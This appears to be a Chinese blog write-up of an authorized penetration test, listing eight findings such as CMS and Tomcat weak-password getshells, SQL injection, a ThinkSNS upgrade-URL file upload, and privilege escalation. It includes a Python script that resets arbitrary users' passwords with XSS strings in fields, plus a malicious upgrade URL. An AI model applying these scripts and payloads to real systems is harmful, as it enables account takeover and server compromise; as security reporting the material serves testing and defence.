当前位置:首页 > Web安全 > 正文内容

某次授权渗透测试小记

UzJu2年前 (2022-04-17)Web安全5142

某次授权渗透测试小记

一、某次授权渗透测试部分小记

本文已得到授权 如发现存在问题发送邮件到:UzJuer@163.com删除文章

1、帝国CMS 后台GETSHELL

图书馆的一个系统,为开源CMS修改的,然后通过版本探测与其他的信息收集,发现那个版本好像有一个getshell,不过是后台的,尝试一下,账号admin密码123456发现对了之后GetShell了

//这个是当时的payload

ec76e303b95d60c03d8de915ec53c4cf.png

efb5b14569518945ad29abcc2183068f.png

点击提交后访问http://xxxxx:port/e/admin/R3inSecurity\_Team.php

然后使用菜刀连接就可以了

1ca0410c71cbf733ea94079cb96e559a.png

不过需要注意的是,这里执行cmd命令会发现其实不是administrator,需要提权,因为当时除了这里其他地方已经获取到了administrator权限, 所以这个shell就没有提权

4984309cf0c07d16bd2ad2ad498e6688.png


2、某营销系统综合实训室逻辑漏洞

以下是我当时挖到漏洞后写的Poc

1.# __author__ 'R3inS3curity.UzJu'
2.# Creat time 2020/7/17 20:14 
3.import requests 
4.import re 
5.from bs4 import BeautifulSoup 
6. 
7.def Hacked_Testing(): 
8.    for a in range(1,100): 
9.        r = 'http://xxx:port/updaXte.dXo?methXod=saXve' 
10.        cookie1s = {'JSESSIONID':'DCBDA30F80F1DEA2X1123C8080FBE', 
11.                   'submenuheader':'-1c'} 
12.        datas = { 
13.            'id':a, 
14.            'password':'123456789', 
15.            'repassword':'123456789', 
16.            'stuNo':'200107', 
17.            'realName':'%E4%B1231%A3', 
18.            'sex':'1', 
19.            'schollTime': '2019-03-08', 
20.            'tel': '%3Cscr23rt123t%3E', 
21.            'address': '%3Cscript%3E1alert%281%23script%3E', 
22.            'birthPlace': '%3Cscrip123Fscript%3E', 
23.            'idNumber': '%3Cscript%3Eale123C%2Fscript%3E', 
24.            'head_img': '%2Fuploadfiles1%123lt_head.gif', 
25.            'x=': '50', 
26.            'y': '6' 
27.        } 
28.        result = requests.post(url=r, cookies=cookie1s, data=datas) 
29.        soup = BeautifulSoup(result.text, features="html.parser") 
30.        print('[+]Current ID is:{},UserName is:{}'.format(a, soup.td.text)) 
31.Hacked_Testing()

当时的漏洞截图

4e37a617ebb01ddb895b5d639eb236ab.png

9cea33309aaa410874599d4a4b882063.png

7caf35d520dd8f79c5b82ea819a83250.png

这个ID就是用户的ID,修改这个就可以重置任何用户的密码^ ^ 然后写脚本跑

e98fe16cb7479fe6616e528c4c81ab32.png

934ca9c83461dca1f51d9aada5667437.png

尝试将修改的密码,进行登录,可以登录成功。

8c9d7c86bfee79d5d322bb93c6754084.png

6b9a3ca752da0b300458b479b2dfa455.png

3、C-xxxx打印服务系统未授权访问

只要一直点直接打印,打印机就会一直出纸,也可以DIY打印内容,只需要替换框中的内容即可,后来沟通中反馈说打印机除了非常多的纸,部分员工还以为打印机坏了

93e54491513d96c73b3347c5ca6995fe.png

4、tomcat弱口令GETSHELL

这个漏洞主要就是tomcat-user.xml的配置问题导致的,然后进到manger后上传shell的war包就可以了

80cd2d24ad17d89122dc9115d7c3c36c.png

这个账号admin 密码为空,然后上传war包就可以getshell了

2e15760927d710b39b08038534c11fa2.png

07ebb73c1e7dbbe1e024a898289c2276.png

53a9152bd10954ab6902fb1bf4e2c60a.png

25745b42bce1d2a5d23b903a1b1df205.png

e5f4cfe0b37e7cba0ed1ab840415238f.png

d3b57324fb0a6132408d8e2af7136c56.png

ddf46351da559eec5d01c41271b62cf1.png

5ed8e46ff5f65fd9370053f6c9a692a8.png

f3fe47b479a7b676dafdb3bedbf67f38.png

0b40fb63b190ebff42848e90e350ffba.png

打包好之后上传就可以啦

699c83ca50e64b8df011ff7b67eaef74.png

e7ca0b6599a1378c0ace96e04a707d2d.png

5、某卓越营销实践系统SQL注入getshell

这个漏洞没啥好说的,上去sqlmap一把嗦就完事了(其实这里还有一个存储型XSS)

5d67d9e08b0baee6049984d058977486.png

7e2871892f01453ba09b5e252ce51fcb.png

c2e77672c7ebc0c058c596a2a87c848b.png

a0d9d419bb14502200c5624066d719a3.png

55a1d6b185917f828c0b6b75ce2b1815.png

ae1933f28aa38464d03af92bd92e0080.png

98e044c0585f789a8d6d3323c8de6ca6.png

49cc4209b2f97218e20ef332e733ef50.png

然后远程链接服务器就可以了

59acba9a32cf689082ead2a7aa7e37e5.png

这个服务器改端口了,本来是3389远程连接的,改成了3300,接下来就简单说一下,怎么找到3300这个端口的

Cmd输入tasklist /svc然后找到TermService找到PID2416

41da8aa7d8a31e309406f7b4986cb402.png

然后使用netstat -aon|findstr “2416”找到对应的PID就能找到远程端口

8b8577218fe01ecdbdb26dbfdce070f7.png


6、ThinkSNS管理员弱口令后台GetShell

弱口令登录,后台getshell

bc11ddb4b443565e7b280df757c7d564.png

8803ee343ffc6cb1e71fa2a75a045f85.png

漏洞复现地址:http://xxx:port/index.php?app=admin&mod=Upgrade&act=step1&upurl=http://xxx:port/test/UzJu.zip

41c7fe881e38882bbdc3a7c9e7e6b0cc.png

由于配置问题,访问/data/upgrade就可以看到目录下的文件,data目录也是如此

1935b8d0fe27110397f672a68c1355f9.png

ee6da88fa761d3899e4187c3416fe379.png

将数据包的act改成setp2和upurl改成filename=UzJu.zip

78f0fee847a1c599f0ca4d123dcc94d8.png

184998b0e2f6a2ce47a6fe1a7faf489e.png

2f26ef300d7335b37927f61797d5762d.png

然后去访问这个Php

7ae9d99ea1370b0de5f00a4e6bca1268.png

5085fbd486f196ce9340da042b0cc5f2.png

然后正常获取权限就行,以下是漏洞代码的位置

漏洞代码发生在路径/apps/admin/lib/Action/UpgradeAction.class.php文件。

b891bb117d8c211a955732c8bbdcdb1e.png

46行处,升级时调用check函数升级通过C(‘UPURL’).’?v=’.C(‘VERSION’)获取升级链接

efa155db004fb6ce818d8cc3fc517adb.png

在169行,直接再次调用且upurl可控,覆盖之前的&upurl远程升级下载包含.php的UzJu.zip压缩包先下载再校验,存在逻辑问题,直接构造url payload下载。此为漏洞的引发起始点,再往下看在226行处step2,Step2解压也存在问题未进行校验文件就进行解压到网站根目录

e19d2a159820177310733b7bf9495e19.png

7、文件共享信息泄露

全是DB与数据

1a7aa50ec08a40087256e083f9a6a0f2.png

02dabb644224f759989b1feb539bd4e1.png

8、某卓越市场营销模拟平台垂直越权

d01dbe1559764bd660f573720011947f.png

2d8d1c38a94bb4ee47b56e239815cc0e.png

d881b2b047806027f601e70854315761.png

登录不同的账号,就会有不同的路径,然后尝试改一改路径,发现可以越权,:)

6ffe79a1fcbaca2f9e15af8cf4874af5.png

031b47dd1795a4a6bc716e8c6715faa6.png

两张图不难发现,我通过修改不同的路径,然后越权到了不同的权限,学生--->老师

e01eee41569f9f92b514acc2d6b1cf5a.png


内网信息收集,随便放几张图吧,太敏感了

e637906ba252d12e67eedf2882c847a8.png

弱口令,永远的神!

扫描二维码推送至手机访问。

版权声明:本文由UzJu的安全屋发布,如需转载请注明出处。

SQL ERROR: ERROR 1105 (HY000): XPATH syntax error: '~root@localhost'

本文链接:https://uzzju.com/post/55.java

分享给朋友:

相关文章

【渗透测试】记一次智慧校园系统一轮游

【渗透测试】记一次智慧校园系统一轮游

记一次智慧校园系统一轮游记一次智慧校园系统一轮游一、前言如发现存在问题发送邮件到:UzJuer@163.com删除文章 关于如何挖逻辑漏洞的思维图 二、智慧校园系统1、www.xxx-xxxx.com svn泄露Ps:后...

浅析:TomCat Getshell拿服务器权限实战

浅析:TomCat Getshell拿服务器权限实战˂a name="0xOO前言" class="reference-link" href="#"˃0xOO前言无意中接触到一个网站 所以索性尝试一下 没什么技术性 都是一些基本操作 大...

Redis常见利用方法

Redis常见利用方法

Redis常见利用方法 Redis简介与学习Redis常见端口 6379 Redis是现在最受欢迎的NoSQL数据库之一,Redis是一个使用ANSI C编写的开源、包含多种数据结构、支持网络、基于内存、可选持久性的键值对存储数据...

两个简单的前端加密逆向

两个简单的前端加密逆向

前言两个站点都是比较简单的前端加密,也都是朋友喊来练练手的,不过Trace这款工具还是不错的吧 推荐一下六边形战士的Github工具:https://github.com/CC11001100/ast-hook-for-js-RE...

Java-SQL注入

Java-SQL注入

1、JDBC1.1、Statement创建连接对象使用CreateStatement() Statement stmt = null; try { stmt = conn.createStatement( ); . ....

未授权与垂直/水平越权(IDOR)检测实现方案

未授权与垂直/水平越权(IDOR)检测实现方案

未授权与垂直/水平越权(IDOR)检测实现方案TODO1、去重通过接口进行去重 防止水平越权时参数不一致导致的同一个URL重复问题 2、黑名单配置 让用户选择可以配置黑名单来禁止检测指定URL 3、白名单配置 让用户选...

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。